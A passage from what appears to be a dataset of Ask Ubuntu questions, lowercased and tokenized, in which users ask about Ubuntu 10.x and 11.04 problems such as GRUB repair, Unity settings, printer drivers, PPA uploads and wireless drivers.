41033	is kde 4.6.x available for ubuntu 10.04 ?	i am wondering if kde 4.6.x is available for the latest lts version of ubuntu . i am not sure if it is in the kubuntu backports ppa for lucid , i checked on launchpad , but was unable to find an entire list of packages for lucid , so i would like to know if it is possible . thank you in advance for any answers provided : )
41040	how do i get the actual used memory including ram disks ?	free -m does not seems to include memory used by ram disks ( tmpfs filesystems ) . maybe because it 's something in the kernel space ? how do i get the real memory usage ( or it 's opposite , free memory ) including the allocated space of filesystems that reside in ram like tmpfs ? i currently check for the memory usage by running df -h and adding the `` in use '' numbers to the -/+ buffers/cache number . is there a command available that gives me the real memory usage ?
41045	is the `` htc desire ( a8181 ) '' android 2.2 phone supported ?	i could not find an entry for htc desire in the supported anrdoid phones so i 'm just wondering if all 2.2 devices are supported or if the list is specific to phone and installed software versions etc ? update : android is listed generically under supported manufacturer and model but i found a stumbling block regardless of my initial query above.. i am on the basic package .. on re reading ( https : //one.ubuntu.com/basic/ ) everyone gets the basicsâś for free ! the option to sync contacts with a mobile phone is for a fee .
41047	integer operators in bash	how can i use ++ , += , *= , etc operators in bash script . examples please . example in c++ : int a = 7 ; a = ++a + ++a ; printf ( `` % d '' , a ) ;
41049	halting problem after upgrade	i recently did the online upgrade from 10.10 to 11.04 and notice random application halting problems . when it happens all activity on the open application freezes , even firefox . if i open the system monitor and the processes tab then the freeze will release , but this is a very annoying problem . is there any way short of a full fresh install to correct this ? thanks in advance for any suggestions ... dave
41053	desktop not hardware compatible with 3d effects	when i try to install 11.04 on my desktop machine , i get a notification that my system is not hardware compatible for 3d effects and that i should run `` classic gnome , '' but even under classic gnome my system does n't seem to be able to run `` natty . '' any ideas , or should i just break down and buy a new video card ? the system can run 10.10 without any issues ( i386 )
41054	can i change priority of process on my graphic card ?	can i change priority of process on my graphic card ? i look for `` nice 10 '' but in gpu , not in cpu . basically i need to `` nice '' a cuda process , because it slow down compiz .
41055	on a brandless rf remote , many buttons do not work with xbmc	i have purchased a brandless rf remote that brandishes an mce logo , and i want to use that on my media pc running xbmc on ubuntu 10.04 lts . the important buttons work out of the box with no configuration : arrows , ok , back and media control ( play/pause , etc . ) , but the remote has many buttons that i want to use to power some more obscure features - from `` go to main screen '' through context menu to `` open subtitles synchronization dialog '' . unfortunately , when i start xbmc in debug mode ( as described here ) , i ca n't get any of these buttons to register . these are buttons like `` channel up/down '' , `` my tv '' , `` dvd menu '' , etc . i also tried to fiddle with lirc , but as i have no idea what i 'm doing , that obviously failed . update : please note that i rather not use lirc and the remote currently works without lirc . the remote has the label `` rm-518 '' and dmesg identifies the usb rf receiver plug like this : input : holtek wireless 2.4ghz trackball keyboard as /devices/pci0000:00/0000:00:0b.0/usb2/2-2/2-2:1.0/input/input4 generic-usb 0003:1241:0504.0001 : input , hidraw0 : usb hid v1.10 keyboard [ holtek wireless 2.4ghz trackball keyboard ] on usb-0000:00:0b.0-2/input0 input : holtek wireless 2.4ghz trackball keyboard as /devices/pci0000:00/0000:00:0b.0/usb2/2-2/2-2:1.1/input/input5 generic-usb 0003:1241:0504.0002 : input , hiddev96 , hidraw1 : usb hid v1.10 mouse [ holtek wireless 2.4ghz trackball keyboard ] on usb-0000:00:0b.0-2/input1 any ideas on how to go about mapping the missing buttons will be highly appreciated
41056	clutterflow not working on nautilus elementary	i tried what is written here but i could n't make clutterflow work . are there any packages needed for it to run ?
41057	install xulrunner 2.0	i would like to try developing in xul to see what the experiance is like . how would i go about installing xulrunner 2.0 and the related sdk ? ** edit 1** this may be related https : //launchpad.net/ubuntu/+source/xulrunner-2.0 i already tried adding deb http : //ubuntu.mirror.cambrium.nl/ubuntu/ natty main universe to /etc/apt/sources.list as i could see xul packages somewhere . however sudo apt-get install xulrunner-2.0 did nothing .
41058	how can i enable bindings in desktop wall ?	i want to use mouse bindings in the compiz desktop wall to go to different workspaces by clicking the mouse in the corners . does anyone know how to make this work ? i 've already tried to do it so in ccsm and in gconf-editor ( apps - > compiz - > plugins- > wall- > options ) but i ca n't enable it . the configuration is there but it 's not working .
41063	why is banshee not showing in sound menu in 11.04 ?	there is no entry for banshee in the sound menu . why is this ? the `` sound menu integration '' and `` mpris d-bus interface '' extensions are enabled .
41068	ubuntu 11.04 stops booting at grub console	i did a fresh install of ubuntu 11.04 , then i installed windows 7 . so i decided to fix the grub after win7 install using the ubuntu 11.04 live cd . disaster : instead of $ sudo grub-install -- boot-directory=/media/uuid/ /dev/sda i entered $ sudo grub-install -- root-directory=/media/uuid/ /dev/sda now when my system boots , it stops at the grub console grub > my problem is exactly as this one http : //aaron-kelley.net/blog/2011/04/grub-prompt-after-upgrade-to-ubuntu-11-04/ but i have not been able to fix my problem . thanx for your help .
41069	how can i grab unity scrollbars from the side of the screen ?	i can grab normal scroll bars by moving my pointer far to the right . i 'm usually able to do this without looking because the pointer stops at the edge , and the scrollbar is on the edge . i 'm familiar with this to the point that i 'm usually not aware of the act of scrolling . in unity , the visual indicator is on the edge , but the control is not . ( this is presumably to prevent the control from covering up the indicator . ) this means that i must now turn my head and look at where my pointer is so that i can properly grab the control . short of removing overlay scrollbars , is there a way to fix this ? `` no , there is currently no way to fix this [ because ... ] '' is an acceptable answer .
41077	install i386 printer driver on an amd64 system ?	according to this topic , it 's possible to install these i386-drivers for my pixma mp560 printer on an amd64 ubuntu . unfortunately , i can not install the drivers : sudo dpkg -i -- force-architecture cnijfilter-common_3.20-1_i386.deb dpkg : warning : overriding problem because -- force enabled : package architecture ( i386 ) does not match system ( amd64 ) ( reading database ... 151200 files and directories currently installed . ) preparing to replace cnijfilter-common : i386 3.20-1 ( using cnijfilter-common_3.20- 1_i386.deb ) ... unpacking replacement cnijfilter-common : i386 ... dpkg : dependency problems prevent configuration of cnijfilter-common : i386 : cnijfilter-common : i386 depends on libc6 ( > = 2.3.4-1 ) . cnijfilter-common : i386 depends on libcupsys2 ( > = 1.2.1 ) | libcups2 . cnijfilter-common : i386 depends on libpopt0 ( > = 1.7 ) . dpkg : error processing cnijfilter-common : i386 ( -- install ) : dependency problems - leaving unconfigured processing triggers for libc-bin ... ldconfig deferred processing now taking place errors were encountered while processing : cnijfilter-common : i386 the packages libc6 , libcups2 , and libpopt0 are installed on my system , but libcupsys2 . but libcupsys2 is a virtual package since ubuntu 7.04 and many users got the printer running under ubuntu 10.10 . i 'm on the 64 bit version of ubuntu 11.04 . any ideas ?
41079	changing to another distro : can the -home partition be kept ?	i want to change from ubuntu 11.04 to another distro and i have /home on a different partition than the other folders . i want to ask if it 's possible to keep the same /home partion with another distro like opensuse or mint ? the reason why i want to make the change is that ubuntu is using a lot of ram ; even my windowsxp with 512 ram is working better than 1gb of ram on ubuntu . but maybe i 'm the only one which thinks that an operating system should not respond to clicks after some seconds or to use all the ram and swap although only one program is running ...
41081	unity/gnome mess	i 've recently upgraded from 10.10 to 11.04 , and immediately switched to unity-2d ( running on a netbook ) . then i tried to load the 10.10 panels because i did n't like the globalmenu . after rebooting i ended up w/out unity and w/out gnome . alt+f2 does n't open terminal either , and i can only access the browser thanks to a keyboard shortcut i once set up . how do i resolve this mess.. ? when i logout/login it does n't let me choose between settings ( ubuntu classic , etc. ) . thanks !
41087	launcher does not display any items	my desktop does not display icons in unity 3d , compiz works 100 % , except for unity . my video card is a geforce fx 5200 ( nvidia-173 ) . see the picture can anyone help ?
41089	'mostly ' compatibility on openprinting.org ?	when searching for laser printers from the desired manufacturer and targeted price range using openprinting.org site , the best i can get for compatibility with ubuntu is 'mostly ' ( explained here and looks like this- ) . i am uncertain what exactly 'mostly ' means . where or how can i search for laser printers that are perfectly compatible with ubuntu ? any recommendations for any printers ?
41092	upgrading from 10.10 to 11.04 , how much space is needed ?	would i have enough space to upgrade to 11.04 from 10.10 on a 4gig asus eee ? i have an sd card in it giving another 4gig . how can i use that space ?
41093	is there a command to go a specific workspace ?	i 'm trying to make a quicklist on the workspace switcher launcher that allows for quick switching to a certain workspace . ( my friend sometimes uses my computer and just does n't enjoy keyboard shortcuts , so i want to help him out . ) so is there a command one could type in a terminal that would force a certain workspace to be focused on ?
41096	theme choosing doesnt work after update	after updating from 10.04 to 11.04 , switching between themes does n't work . the upper and lower panels look different from the rest of the system : all attempts at changing this did n't give me any results . it just changed the theme to `` other '' , not to any from the list . so , what should i do to change theme to ambiance , for example ?
41101	can i change gedit 's background color without changing to another theme ?	i like ambiance but i find it a little too hard on the eyes to have to edit files on a pure white background , like gedit 's . is there any way to modify my theme to make gedit 's background color darker ?
41106	managing an ubuntu server	i 'm working on a few projects at the moment , including working with php , asp.net and mono , and wanting to learn python ( in both a scripting and web context ) . although my laptop ( win 7 ) works pretty well for the development stuff i need , i want to run a linux server to host my projects on for some proper testing and to make sure that any differences between the windows and linux platforms are ironed out ( read differences between mono and .net framework ; ) ) . i 've got some old hardware which i 'm going to be using as the server and as i have some experience with ubuntu on the desktop i figured i would give ubuntu server a go . installation was fine , and everything 's working as expected , but i find the command line a bit of a bind . my question is : does anyone know of any nice server management software which can be installed to make maintaining the server any easier . i 've already got things like phpmyadmin installed which makes managing the mysql server a breeze , but i still have to login to do a lot of the donkey work to keep the server up-to-date etc . is there any ( maybe web based ? ) software out there that would make maintaining the server easier ? thanks , mo
41109	random mouse freeze on boot	i 've upgraded 8 computers to 11.04 from 10.10 through the standard update version process . two are giving me problems with the udb optical mouse being frozen upon boot , to either a login prompt , or to the desktop . both computers are running amd processors . both are 32 bit systems . one has nvidia graphics and one has ati graphics , which seems to rule out graphics . i tried changing the drivers on the nvidia system and that did n't make any difference . doing a complete power down of the system was the only way i found try to get it working until i discovered that if i unplug the mouse mouse and plug it back in , it will work fine from then on . doing a restart when it is frozen never results in a functioning mouse . other than unplugging the mouse , a complete power down is required . both systems were using the same make/model of mouse , logitech . to rule out it being the mouse , i 've been using one of them on my laptop with 32 bit ubuntu 11.04 , and it has worked perfectly , so it most likely is n't a mouse issue , although using an acer mouse on the one system seemed to alleviate the problem . if i plug the logitech mouse into the front mouse usb ports instead of using the rear usb ports on each computer , the number of times the mouse is frozen on boot has significantly been reduced . it still happens occasionally , but not nearly as frequently . both computers are using ps2 keyboards , so i do n't know the situation would be if they were usb . the computer with the ati graphics card is my wifes . i have the exact same computer at home with nvidia graphics at home . mine has worked perfectly . but the other computer with problems has nvidia graphics , so , as i said before , i doubt it is a graphics problem . i 'm guessing it is a kernel issue . one suggestion i found on line was modifying the grub file line grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash pcie_aspm=off '' but that did n't make any difference . both machines worked fine in 10.10 , 10.04 , 9.10 , and 9.04 . it has now been two weeks since the last update here . my co-worker purchased a new logitech wireless mouse . there have not been any freezes on boot with the wireless sending unit on either a front or rear usb port . on my wife 's computer about 20 % of the time her mouse is frozen on boot , but unplugging it and replugging it makes it work without issue .
41111	gedit 's latex plugin opens a dialog called `` choose master document '' each time a .tex file is opened	i use gedit-latex-plugin to edit my latex documents . however , each time i open a .tex or .sty file , an annoying dialog labeled `` choose master document '' pops up , and unless i select the same file again , gedit does n't enter `` latex mode '' . is there a way to disable this dialog or simply always load `` latex mode '' when a .tex file is opened ?
41116	grub2 lost my windows 7 install	i installed ubuntu 10.04 about a week ago and have been able to dual boot between it and windows 7 without any difficulty . a few days ago i went to boot windows and it was n't in grub 's menu . per another question , i installed startupmanger , but it does n't seem to offer any options for adding a new os . how do i restore windows 7 to my grub2 menu ? edit : given that i do n't have a /boot/grub/menu.lst i 'm assuming i 'm using grub2
41118	virtualbox kernel driver not installed	i tried to use my virtual box and this is the error i received - ( i just updated to the new ubuntu also ) and i am very new at this linux os . kernel driver not installed ( rc=-1908 ) the virtualbox linux kernel driver ( vboxdrv ) is either not loaded or there is a permission problem with /dev/vboxdrv . please reinstall the kernel module by executing '/etc/init.d/vboxdrv setup' as root . users of ubuntu , fedora or mandriva should install the dkms package first . this package keeps track of linux kernel changes and recompiles the vboxdrv kernel module if necessary .
41119	gnome-font-manager missing on gnome3 ?	i 'm using the gnome3 ppa . the gnome-font-manager is missing in the new gnome-control-panel . is this going to be added some day ?
41133	how to do critical system updates through the command line under kubuntu 10.10	i really need to do some system updates because sometimes my s.o kubuntu 10.10 fails to start , crash down or keeps freezing after i log in . the problem is , i can not use kpackagekit because it offers updates for the packages of every application instaled on my computer and i just want to do kernel related updates because my internet connection is to slow and unnestable and i think the downloading would take an eternity in case it does n't fail . how could i do that kind of updates using the aptitude or something like that ? thanks in advance !
41135	slowdowns while using firefox	i have windows 7 and natty installed on my computer . there is no problem on windows 7 's side , but whenever i log into natty , it slows down while using firefox 4 . i tried it in normal mode using unity and classic mode . however , the result is the same : it slows down e.g . when i scroll , it takes time to get effect , and also when i click other tabs , it takes time to active them . moreover i can not type properly , due to the lag . i do n't know what the problem is ?
41136	installing via apt-get install always give `` the http server sent an invalid content-range header ''	when i try to install software like wine 1.3 , i alwasys get something like ... err http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/ natty/main wine1.3 amd64 1.3.19-0ubuntu1~maverick1~ppa1 the http server sent an invalid content-range header failed to fetch http : //ppa.launchpad.net/ubuntu-wine/ppa/ubuntu/pool/main/w/wine1.3/wine1.3_1.3.19-0ubuntu1~maverick1~ppa1_amd64.deb the http server sent an invalid content-range header unable to correct missing packages . e : aborting install . http : //pastie.org/1876695 when i try from software center , within seconds , i get my internet works , tho i 'd say its quite intermittent many times , on wireless ... but i am intending to get a usb ethernet adapter to go wired again ... update is this a wine 1.3 only problem ? i managed to install wine 1.2 tho ?
41145	automatically detect unresponsive processes	every once in a while , a process becomes unresponsive for whatever reason . after noticing my laptop fan crying out loud i quickly find and kill the culprit in htop . my question is : is there a graphical tool for detecting such events ? something similar to android 's `` force quit | wait '' dialog when an app is taking longer than usual . i 've searched for a bit but came up with nothing ... maybe i was n't using the right terms . thanks !
41146	configuring multiple mouse settings	i am a left-handed thinkpad user and have grown used to using the trackpoint in its default right-handed configuration . when i use my bluetooth mouse , however , i would like the buttons to have a left-handed layout . in 11.04 ( natty ) i can configure this manually using xinput , but i would like to have it applied automatically when the mouse is connected . i have followed the xorg documentation by creating /etc/x11/xorg.conf/99-ms500mouse.conf and placing the following into it : section `` inputclass '' identifier `` microsoft bluetooth mouse 5000 button remap '' matchproduct `` microsoft bluetooth notebook mouse 5000 '' matchdevicepath `` /dev/input/event* '' option `` buttonmapping '' `` 3 2 1 4 5 0 0 0 0 0 0 0 '' endsection this seems to work initially ( gdm seems to be using it correctly ) , but when i log in and start my x session , the buttons are mysteriously reverted : $ xinput get-button-map `` microsoft bluetooth notebook mouse 5000 '' 1 2 3 4 5 6 7 8 9 10 11 12 the following is my /var/log/xorg.0.log : [ 276.648 ] ( ii ) config/udev : adding input device microsoft bluetooth notebook mouse 5000 ( /dev/input/mouse1 ) [ 276.648 ] ( ii ) no input driver/identifier specified ( ignoring ) [ 276.649 ] ( ii ) config/udev : adding input device microsoft bluetooth notebook mouse 5000 ( /dev/input/event14 ) [ 276.649 ] ( ** ) microsoft bluetooth notebook mouse 5000 : applying inputclass `` evdev pointer catchall '' [ 276.649 ] ( ** ) microsoft bluetooth notebook mouse 5000 : applying inputclass `` microsoft bluetooth mouse 5000 button remap '' [ 276.649 ] ( ii ) using input driver 'evdev ' for 'microsoft bluetooth notebook mouse 5000' [ 276.649 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 276.649 ] ( ** ) microsoft bluetooth notebook mouse 5000 : always reports core events [ 276.649 ] ( ** ) microsoft bluetooth notebook mouse 5000 : device : `` /dev/input/event14 '' [ 276.670 ] ( ** ) microsoft bluetooth notebook mouse 5000 : buttonmapping '3 2 1 4 5 0 0 0 0 0 0 0' [ 276.670 ] ( -- ) microsoft bluetooth notebook mouse 5000 : found 8 mouse buttons [ 276.670 ] ( -- ) microsoft bluetooth notebook mouse 5000 : found scroll wheel ( s ) [ 276.670 ] ( -- ) microsoft bluetooth notebook mouse 5000 : found relative axes [ 276.670 ] ( -- ) microsoft bluetooth notebook mouse 5000 : found x and y relative axes [ 276.670 ] ( -- ) microsoft bluetooth notebook mouse 5000 : found absolute axes [ 276.670 ] ( ii ) evdev-grail : failed to open grail , no gesture support [ 276.670 ] ( ii ) microsoft bluetooth notebook mouse 5000 : configuring as mouse [ 276.670 ] ( ii ) microsoft bluetooth notebook mouse 5000 : adding scrollwheel support [ 276.670 ] ( ** ) microsoft bluetooth notebook mouse 5000 : yaxismapping : buttons 4 and 5 [ 276.670 ] ( ** ) microsoft bluetooth notebook mouse 5000 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 276.670 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1a.1/usb4/4-2/4-2:1.0/bluetooth/hci0/hci0:11/input14/event14 '' [ 276.670 ] ( ii ) xinput : adding extended input device `` microsoft bluetooth notebook mouse 5000 '' ( type : mouse ) [ 276.670 ] ( ii ) microsoft bluetooth notebook mouse 5000 : initialized for relative axes . [ 276.670 ] ( ww ) microsoft bluetooth notebook mouse 5000 : ignoring absolute axes . [ 276.670 ] ( ** ) microsoft bluetooth notebook mouse 5000 : ( accel ) keeping acceleration scheme 1 [ 276.670 ] ( ** ) microsoft bluetooth notebook mouse 5000 : ( accel ) acceleration profile 0 [ 276.671 ] ( ** ) microsoft bluetooth notebook mouse 5000 : ( accel ) acceleration factor : 2.000 [ 276.671 ] ( ** ) microsoft bluetooth notebook mouse 5000 : ( accel ) acceleration threshold : 4 as you can see , it appears to apply the button mapping i want ( that is , swap buttons 3 and 1 and disable all others ) , but once the session starts this is gone . how do i make sure these settings stick ? thanks a lot !
41154	what file do i have to run in order to launch a screenlet from the terminal ?	i remember i had to run a python file a while ago but i ca n't remember where i have to find and which one i have to run when i get there ( i think there were many python files in each directory ) ( to make it more specific : for example , how can i run the lyrics screenlet from the terminal ? )
41157	improve screen resolution in ubuntu 11.04	this is probably a duplicate question , but i 'm not able to find an answer that i understood . i have just installed ubuntu on virtualbox in winxp . i 'd like to improve the screen resolution to 1280x800 ( which is what my host os uses ) , but the settings only show up to 1024x768 in monitors ( also it shows unknown monitor ) . thanks for any help , rajath
41162	java bin file wo n't install manually	i downloaded a java bin file manually from here . then i tried to install it using the following commands . but i am not able to install it . can anybody help me to install manually ? aneal @ ubuntu : ~/downloads $ sh jdk-6u25-linux-i586.bin unpacking ... checksumming ... extracting ... jdk-6u25-linux-i586.bin : 113 : ./install.sfx.5171 : not found failed to extract the files . please refer to the troubleshooting section of the installation instructions on the download page for more information . aneal @ ubuntu : ~/downloads $ sudo ./jdk-6u25-linux-i586.bin unpacking ... checksumming ... extracting ... ./jdk-6u25-linux-i586.bin : 113 : ./install.sfx.5197 : not found failed to extract the files . please refer to the troubleshooting section of the installation instructions on the download page for more information . ps : my architecture is x86
41169	how to properly install an unzipped program into the launcher ?	i just download and unzipped aptana studio into /opt/aptanastudio3 , and ran the program /opt/aptanastudio3/aptanastudio3 using the nautilus file explorer . it shows as an icon on the launcher when running , so i right-clicked the launcher icon and checked keep in launcher . now when i click the launcher icon for aptana studio it is not launched . ( note : it 's not currently running when i do this ) . the funny thing is , the launcher tooltip for aptana references an ini file like `` web - `` my-path-to-aptana/aptanastudio3.ini - realname whereas the other programs in the launcher ( installed via package manager ) just have their real title name . considering all this , my question is : how can i get an unzipped file to be properly installed into the launcher ?
41170	uninstall/rollback 11.04 ?	i foolishly upgraded my ubuntu installation to 11.04 . even with `` classic '' mode it is dog slow . the gui is herky-jerky and before it was fine . i want to go back to what i had before . is there a way of rolling back/uninstalling the 11.04 upgrade or do i have to clean install 10.x ?
41173	switching between kubuntu and ubuntu without re-installation	i have kubuntu 11.04 installed on my laptop , and i want to try , and probably switch to , gnome-based ubuntu . what is the best way to do so , by using the package manager , and not overriding the installation ? i tried it before , but every time i had unwanted leftovers - the welcome or shutdown screen did n't change , dangling packages remained , etc . for generality , the question goes also the other way around : how can one replace the kde-based distro with gnome , without any leftovers ? is there a systematic way to completely replace kubuntu < - > ubuntu , and make sure that the only remaining things are the home partition ?
41177	how do i remove/ignore words from gedit 's spell checker dictionary ?	how do i remove/ignore words from gedit 's spell checker dictionary ?
41178	fake raid ( dmraid ) not seeing new sata drives	i have three drives in my machine , one ssd with 32gb and two 1tb drives , attached to an intel 82801ji ( ich10 ) sata ahci controller . the problem is , that i can access only one of the 1tb drives when the other one is not plugged in . when it is plugged in i see the drives as sda and sdb , but there seem to be no partitions . looking at these drives with cfdisk , the partitions are there , though . both of the 1tb drives are carrying a partition , being part of a software raid1 , created with mdadm . before i threw the ssd into the mix , the other two have been working fine . any hints ?
41181	kernel logging stopped	i found the following line at the end of my /var/log/messages.1 apr 29 13:58:29 mylaptop kernel : kernel logging ( proc ) stopped . /var/log/messages is indeed empty ? this happened when i updated to natty . i am trying to debug another problem so i am wondering : what happened ? where did my logging go to ? how can i turn it back on ?
41182	how to make a partition invisible ?	i have 2 hdds . one with ubuntu and one with win7 . the win7 disk has 3 partitions of which i want to make the boot partition with win7 on make invisible for ubuntu . when i make it hidden in gparted my win7 does not boot anymore . can i make it invisible for ubuntu but bootable .
41183	compiling g++ 4.7.0 in 11.04	i encountered the following problem while compiling g++ 4.7.0 . the file asm/errno.h is not found because it is being search for in /usr/include/linux/ instead of /usr/include/x86_64-linux-gnu , which is the right place . after a lot of web searching i was able to diagnose the problem but not fix it . after trial and errors and dicsuccions with gcc developers , they suggested that it is an ubuntu packaging problem : the headers are not properly set . i really do n't know to report this , but i found a solution . set the following environment variables : export c_include_path=/usr/include/x86_64-linux-gnu export cplus_include_path=/usr/include/x86_64-linux-gnu the directory name may change with the machine . in fact this problem does not allow one to compile any c or c++ programs .
41188	does g++ compiler have graphical user interface ?	as the question says , i wonder if the default ubuntu compiler , g++ , has graphical user interface .
41190	any editor that does autocompletion in ubuntu ?	is there any editor/ide ( or a plugin for an existing editor like vim or gedit ) that does auto-completion of many languages ( not just c++ ) ? aptana does only html/css/js and code : :blocks does only c++ ( i might be wrong on this one . if so , please correct me ) . in windows , notepad++ does a pretty neat job .
41197	proftpd - shortcut/alias to directory	i 'm not sure what is the proper name of this but let me explain , bob is logging into ftp , he noticed that he is in his home and also sees somedir , otherdir and somefiles some day he decided to navigate to otherdir and he was not suprised when he seen someotherfiles however he had no idea what was happening behind the scenes , when he gone to otherdir he went from /home/ftp/bob/ to /var/magicaldir . so in short , i want to map a physical directory so it can be accessed by the user as it would be in his home . how should i approach that ? note : security is not big concern , i use this as my home test server .
41208	how to launch an application in unity ?	how do i launch an application in ubuntu with unity ?
41213	what does `` key to choose 5th level '' in gnome-keyboard-properties do ?	there is an option to specify a key to be used to acces 5th level on the keyboard in gnome-keyboard-properties ( `` keyboard '' under hardware in system settings ) : but if i set the 5th level to altgr and the third level to right ctrl and if i set key 54 as follows : xmodmap -e `` keycode 54 = 1 2 3 4 5 6 7 8 '' i get following results from pressing different variations : keycode 54 = 1 keycode 54 + right ctrl = 5 keycode 54 + right ctrl + shift = 6 keycode 54 + shift = 2 keycode 54 + altgr = 1 keycode 54 + altgr + shift = 2 ( 1 ) so what does the 5th level modifier do ? ( 2 ) how do i set it up so that i can get 5 or six different characters out of a single key ( modified by shift , altgr and right ctrl for example ) ?
41214	update-manager failing	when i try to start my update-manager , i get the following message . an unresolvable problem occurred while initializing the package information . please report this bug against the 'update-manager ' package and include the following error message : 'e : encountered a section with no package : header , e : problem with mergelist / var/lib/apt/lists/dk.archive.ubuntu.com_ubuntu_dists_natty_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . ' where do i go from here ?
41215	how to make unity permanent and not temporary ?	i recently upgraded to the final release of ubuntu 11.04 . was previously running my laptop on ubuntu 10.04 which was perfectly fine . after the upgrade , i noticed the panels were missing . i did a unity -- reset and everything came back . now the issue is that the panels are not permanent , every time i start my pc , i have to do a unity -- reset . can this be sorted ? ubuntu level : novice
41218	how to fix an upgrade interruption from 10.04 to 10.10 ?	i was in the process of upgrading from 10.04 to 10.10 via the update manager . in the midst of the installation process , the system lost power . now when i boot , the login window shows nothing . how do i fix this ?
41224	what keyboard shortcut should be implemented for a search & replace dialog ?	some text editors use ctrl + h while others ctrl + r -- some even know both . should maybe the find dialog double as replace dialog , so ctrl + f would be another option ? is there user experience style guide on that ? cheers
41225	unable to logon to ubuntu	i am not able to login to ubuntu . it is booting like normal but getting hung showing the wallpaper , without any panels loaded . the cursor turns to waiting circle ( hourglass equivalent ) and nothing happens . how can i troubleshoot . p.s i have set to logon automatically without prompting for password . before the restart , i had installed docky . edit 1 : i logged on to console ( recovery mode ) and removed all startup applications i added from ~/.config/autostart but it did n't help . edit:2 i removed docky . still not logging in . panels are not getting loaded and alt+f2 does n't work
41226	install xbmc on natty ?	i am having trouble installing the media centre xbmc on natty . i have added the sources and got a 404 error . is there a way of installing xbmc onto natty ? cheers
41227	wrong screen resolution on an intel d510mo	i 've installed 11.04 onto a intel d510mo , everything works except i ca n't change to resolution to anything better than 1024x768 . the monitor is capable of supporting 1280x1024 . can anyone help ? thanks .
41232	shell tweak to show current path in addition	i 'm using ubuntu 10.10 and now i got in the shell something like that : machine1user @ mylinux : ~ : how can i change it to machine1user @ mylinux : /my/current/path : ~ : ?
41240	problems with photoshop cs5 on wine 1.3 : c++ library runtime error	when i try running photoshop cs3 after installing it following this tutorial , i got also i noticed that http : //pastie.org/1877592 jiewmeng @ jm : /works/tmp/adobe $ winetricks msxml6 gdiplus gecko vcrun2005sp1 vcrun2008 msxml3 atmlib ... vcrun2005 install completed , but installed file /home/jiewmeng/.wine/dosdevices/c : /windows/winsxs/x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.5592_x-ww_e87e0bcd/mfc80.dll not found i am thinking thats a problem ?
41241	shortcut to change launcher 'hide ' setting	when i 'm working on my laptop i have periods that i am only using a couple of programs , so the default intellihide setting of the launcher ( 'dodge windows ' ) is very handy . but i also have periods that i have to switch very often between programs , and then i find it very useful ( and better for my workflow ) that the launcher does n't hide . now , every time i wa n't to switch i have to open ccsm and change the setting ( unity plugin - > hide launcher ) , but it would be easier if i could use a shortcut for it . so my question : is there a way to create a shortcut to switch between ( or change ) the two settings of compiz ? i thought of command line interface to compiz , but i could n't directly find something like that .
41245	what are the message that pop up when the mouse is still called ?	when you stop over a button or element of a program and a window pops up giving information about it , is called what ?
41247	enable replace image feature in libreoffice	one of the programs i use heavily in ubuntu is open/libreoffice as part of my work specifically draw . i recently upgraded to natty 11.04 ( clean install ) obviously this has meant switching to libreoffice . i know i can go back to openoffice if i want to but oracle seem to be more interested in lawyers than foss and i 'm sure lo will be a lot better in a short period of time . the only problem i have found switching is a strange ( irritating ) difference which does n't seem to have a config setting that i can change . in oo when i select an image and insert a new one it will `` replace '' the original using the same dimensions in lo this is not the case the image is simply added to the page whether you select an image on the page or not . i did find an oo extension which provides the same functionality change picture extension - http : //extensions.services.openoffice.org/en/project/changepicture the main issue is the extension does n't use the `` working directory '' of lo so you have to navigate to the correct directory each time ( censored ) . as i will be doing this for 4 pictures per document and over 1000 documents and possibly many more in the future my sanity is at stake . so if any one has any insights on the easiest way to solve this one thanks in advance .
41258	problem with ppa upload . gpg signature : verification failed 3 times	i 'm trying to upload a package to ppa , but i get the error message ( it is in the end of this post ) . i 've created the ppa and tried to upload a signed package and i got the error . i thought that this is because i do n't have my ssh key in the settings , so i 've added one . but the problem is still here . what should i do to upload my package to ppa ? bessarabov @ bessarabov-note : ~/tmp/delete_after_2011-05-08 $ dput ppa : bessarabov/star libsql-easy-perl_0.02-1_i386.changes checking signature on .changes gpg : signature made sun 08 may 2011 01:36:39 pm msd using rsa key id 79b2238b gpg : good signature from `` ivan bessarabov `` good signature on /home/bessarabov/tmp/delete_after_2011-05-08/libsql-easy-perl_0.02-1_i386.changes . checking signature on .dsc gpg : signature made sun 08 may 2011 01:36:24 pm msd using rsa key id 79b2238b gpg : good signature from `` ivan bessarabov `` good signature on /home/bessarabov/tmp/delete_after_2011-05-08/libsql-easy-perl_0.02-1.dsc . uploading to ppa ( via ftp to ppa.launchpad.net ) : uploading libsql-easy-perl_0.02-1.dsc : done . uploading libsql-easy-perl_0.02-1.tar.gz : done . uploading libsql-easy-perl_0.02-1_all.deb : done . uploading libsql-easy-perl_0.02-1_i386.changes : 1k/2k550 changes file must be signed with a valid gpg signature : verification failed 3 times : [ `` ( 7 , 9 , u'no public key ' ) '' , `` ( 7 , 9 , u'no public key ' ) '' , `` ( 7 , 9 , u'no public key ' ) '' ] : permission denied . note : this error might indicate a problem with your passive_ftp setting . please consult dput.cf ( 5 ) for details on this configuration option . bessarabov @ bessarabov-note : ~/tmp/delete_after_2011-05-08 $
41259	how to disable `` n '' wireless mode rtl8192on a thinkpad edge 15 core i5	i 've seen many owners of thinkpad edges which are supposed to be linux-friendly having problems with wireless adapter . i 've found several links inside askubuntu and in ubuntuforums which have a lot of workarounds for those problems , mine seems to be weird though . i use my laptop on both my office and at home . at home i have a router which is a/b/g and here at home the wireless connection works just fine , using a wep key . but in work i have a b/g/n wireless router and it does n't work , my guess is that this adapter works with n modes but somehow this is buggy in the bundled driver in natty . i 've tried to disable the `` n '' mode in the router but that did n't work . later i went to realtek website , downloaded their driver and compiled myself , kinda seems to work most of the time but sometimes some websites keep trying to load or load just parts of it and images start to look like their links are broken and so on , much like what you get when you were loading a page and suddenly the connection is lost . this problem , as i said , is only using the realtek driver from their website . dmesg gives me this a lot of these : [ 5869.049454 ] rtl8192se_update_ratr_table : ratr_index=0 ratr_table=0x00000ff5 [ 5879.240563 ] dhcp pkt src port:68 , dest port:67 ! ! so i thought i might as well switch back to the original driver which seems to work just fine on a/b/g wireless networks but not on n networks so if anybody knows how to disable that mode from within the driver please let us know : ) p.s . i did find a similar question , wifi range issues and intermittent dropouts , 